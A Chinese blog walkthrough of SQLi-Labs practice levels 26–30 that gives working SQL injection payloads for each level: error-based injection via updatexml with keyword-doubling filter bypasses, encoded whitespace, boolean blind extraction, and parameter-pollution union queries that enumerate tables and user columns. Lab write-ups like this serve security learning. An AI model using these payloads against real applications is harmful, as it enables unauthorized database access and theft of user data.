SQLi-LABS靶场26-30通过攻略

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量704 收藏 22
点赞数 11
文章标签: 安全 mssql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82451607/article/details/141528570
版权

less-26

这一关会过滤关键词and和or 还有注释符

1.判断注入点

在url后加单引号会引起报错 说明存在注入 可以尝试使用报错注入

2.判断是否可以使用报错注入

id=1'||updatexml(1,0x7e,1)anandd'

可以看到页面有错误回显 说明可以使用报错注入

3.查询数据库名

id=1'||updatexml(1,concat(1,database()),1)anandd'

4.查询数据库的所有表

id=1'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='security')),0x7e)anandd'

5.查询users表的所有字段

id=1'||updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema)='security'anandd(table_name)='users')),1)anandd'

less-27

这一关会过滤注释符和union 和select关键字

1.判断注入点

在url后加上单引号会引起报错 说明存在注入 尝试使用报错注入

2.判断是否可以使用报错注入

id=1'and%09updatexml(1,0x7e,1)and' 发现页面有报错信息 说明可以使用报错注入

3.查询数据库名

id=1'and%09updatexml(1,concat(1,database()),1)and'

4.查询数据库的所有表

id=1'and%09updatexml(1,concat(1,(sEleCt%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security')),1)and'

5.查询users表中的所有字段

id=1'and%09updatexml(1,concat(1,(sEleCt%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users')),1)and'

less-28

1.判断注入点

加上单引号会引起报错  说明存在注入 

2.尝试使用布尔盲注

3.判断数据库长度

?id=2%27)%0aand%0alength(database())=8%0aand%0a(%271%27=%271

当数据库长度等于8 时 页面显示正常 说明数据库长度=8

4.查询数据库名

使用ASCII函数 利用ASCII码来判断数据库第一位字符

?id=2')%0aand%0aascii(mid(database(),1,1))=115%0aand%0a('1'='1

当数据库第一位的ASCII码=115时 页面显示正常 说明第一位字符的ASCII=115 也就是s

以此类推 可以得出数据库是security

5.查询数据库的所有表

?id=2%27)%0aand%0aascii(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a0,1),1,1))=101%0aand%0a(%271%27=%271

当第一个表的第一位字符的ASCII码=101时 页面显示正常 说明第一位字符的ASCII=101 也就是e

以此类推 可以得出所有表

less-29

这一关是双服务器解析 所有我们使用双参数绕过

1.判断注入点

在url后加上单引号 会引起报错 说明存在注入

2.判断回显点

?id=1&&id=0' union select 1,2,3 --+

3.查询数据库名

?id=1&&id=0' union select 1,database(),3 --+

4.查询数据库所有表名

?id=1&&id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

5.查询users 表的所有字段

?id=1&&id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

less-30

这一关和上一关一样都是双参数 只是闭合方式不一样

1.判断注入点

在url后加入双引号 发现页面不正常 说明双引号是注入点

2.判断回显点

?id=1&id=-1" union select 1,2,3--+

3.查询数据库名

?id=1&id=-1" union select 1,database(),3--+

4.查询数据库的所有表

?id=1&id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

5.查询users表的所有字段

?id=1&id=-1" union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

cc775210
关注
sqli-labs靶场搭建
AlienEowynWan的博客
11-17 346
解压放在phpstudy的WWW文件夹
sqli-labs靶场
05-30
SQL注入(SQL Injection)是一种常见的网络安全漏洞,主要发生在应用...通过sqli-labs靶场的学习,你可以提升对SQL注入的理解,掌握检测和防护的方法,这对于任何涉及Web开发或网络安全的角色来说都是非常宝贵的技能。
sqli-labs靶场通关攻略
test_zpx的博客
08-14 479
Good Good Study,Day Day Up!
sqli-labs靶场安装
qq_44624916的博客
02-04 530
小皮phpstudy搭建sqli-labs靶场
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQLi-labs靶场(21-30)过关超详细0基础
m0_67803321的博客
07-28 2085
sqli-lasbs靶场21-30关详细过关方式
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2218
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs-master靶场通关
m0_75208155的博客
08-12 885
sqli-labs-master靶场通关
sqli-labs靶场通关攻略(1-75)
shw_yzh的博客
08-14 1024
sqli-labs靶场超级细通关攻略
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1158
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 689
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1274
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
安全服务面试
m0_74402888的博客
09-28 602
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1158
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值